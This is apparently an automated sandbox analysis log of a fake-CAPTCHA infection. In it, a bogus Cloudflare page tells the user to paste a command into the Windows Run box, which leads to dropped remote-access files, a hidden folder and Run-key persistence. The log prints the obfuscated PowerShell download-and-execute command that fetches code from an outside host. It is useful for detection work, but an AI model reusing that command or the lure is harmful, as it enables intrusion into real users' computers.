                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: wtsapi32.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: dbgcore.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: nsmtrace.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: nslsp.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: devobj.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: pcihooks.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: textshaping.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: winsta.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: riched32.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: riched20.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: usp10.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: msls31.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: pciinv.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: firewallapi.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: fwbase.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: fwpolicyiomgr.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\notepad.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Roaming\fzxYFa\client32.ini
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeFile opened: C:\Windows\SysWOW64\riched32.dll
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeFile opened: C:\Users\user\AppData\Roaming\fzxYFa\MSVCR100.dll

                      Data Obfuscation

                      barindex
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X

                      Persistence and Installation Behavior

                      barindex
                      Source: screenshotOCR Text: x e about:blank X Just a moment.. inspyrehomedesign.com CloudFlare Veri g the action below. Complete these Verification Steps ENG English (United Kingdom) To better prove you are not a robot, please: SG Swiss German keyboard ENG English (United Kingdom) 1. Press & hold the Windows Key + R Clou urity of your DE German keyboard 2. In the verification window press Ctrl + V. 3. Press Enter on your keyboard to finish conn You will observe and agree: "Versify you are human - Ray Verification TID: 7342" Perform the steps above to VERIFY finish verification. Performance & security by Cloudflare 14:51 ENG p Type here to search 28/10/2024
                      Source: screenshotOCR Text: x e about:blank X Just a moment.. inspyrehomedesign.com CloudFlare Veri g the action below. Complete these Verification Steps ENG English (United Kingdom) To better prove you are not a robot, please: SG Swiss German keyboard ENG English (United Kingdom) 1. Press & hold the Windows Key + R Clou urity of your DC German keyboard 2. In the verification window press Ctrl + V. 3. Press Enter on your keyboard to finish conn You will observe and agree: "Versify you are human - Ray Verification TID: 7342" Perform the steps above to VERIFY finish verification. Performance & security by Cloudflare 14:51 ENG p Type here to search 28/10/2024
                      Source: screenshotOCR Text: x e about:blank X Just a moment.. inspyrehomedesign.com CloudFlare Veri g the action below. Complete these Verification Steps To better prove you are not a robot, please: 1. Press & hold the Windows Key + R Clou urity of your 2. In the verification window press Ctrl + V. 3. Press Enter on your keyboard to finish conn You will observe and agree: "Versify you are human - Ray Verification TID: 7342" Perform the steps above to VERIFY finish verification. Performance & security by Cloudflare x Run Type the name of a program, folder; document or Internet resource and Windows will open it for you, Open: Run 0K 14:51 ENG p Type here to search 28/10/2024
                      Source: Chrome DOM: 1.1OCR Text: CloudFlare Veri g the action below. Complete these Verification Steps To better prove you are not a robot, please: 1. Press & hold the Windows Key + R Clou urity of your 2. In the verification window, press Ctrl + V. 3. Press Enter on your keyboard to finish. conn You will observe and agree: "Versify you are hutzri - Ray Verification 7942" Perform the steps above to VERIFY finish verification. Performance & security by Cloudflare
                      Source: screenshotOCR Text: x e about:blank X Just a moment.. inspyrehomedesign.com CloudFlare Veri g the action below. Complete these Verification Steps To better prove you are not a robot, please: 1. Press & hold the Windows Key + R Clou urity of your 2. In the verification window press Ctrl + V. 3. Press Enter on your keyboard to finish conn You will observe and agree: "Versify you are human - Ray Verification TID: 7342" Perform the steps above to VERIFY finish verification. Performance & security by Cloudflare 14:51 ENG p Type here to search SG 28/10/2024
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\fzxYFa\PCICHEK.DLLJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\fzxYFa\PCICL32.DLLJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\fzxYFa\TCCTL32.DLLJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\fzxYFa\msvcr100.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\fzxYFa\HTCTL32.DLLJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\fzxYFa\pcicapi.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\fzxYFa\remcmdstub.exeJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeJump to dropped file
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1234
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8644
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\fzxYFa\PCICHEK.DLLJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\fzxYFa\PCICL32.DLLJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\fzxYFa\TCCTL32.DLLJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\fzxYFa\msvcr100.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\fzxYFa\HTCTL32.DLLJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\fzxYFa\pcicapi.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\fzxYFa\remcmdstub.exeJump to dropped file
                      Source: C:\Windows\System32\svchost.exe TID: 6532Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8016Thread sleep count: 1234 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8016Thread sleep count: 8644 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8060Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exe TID: 7088Thread sleep count: 46 > 30
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exe TID: 7088Thread sleep count: 191 > 30
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\user\AppData\Roaming\fzxYFa
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h C:\Users\user\AppData\Roaming\fzxYFa
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\fzxYFa\client32.exe "C:\Users\user\AppData\Roaming\fzxYFa\client32.exe"
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
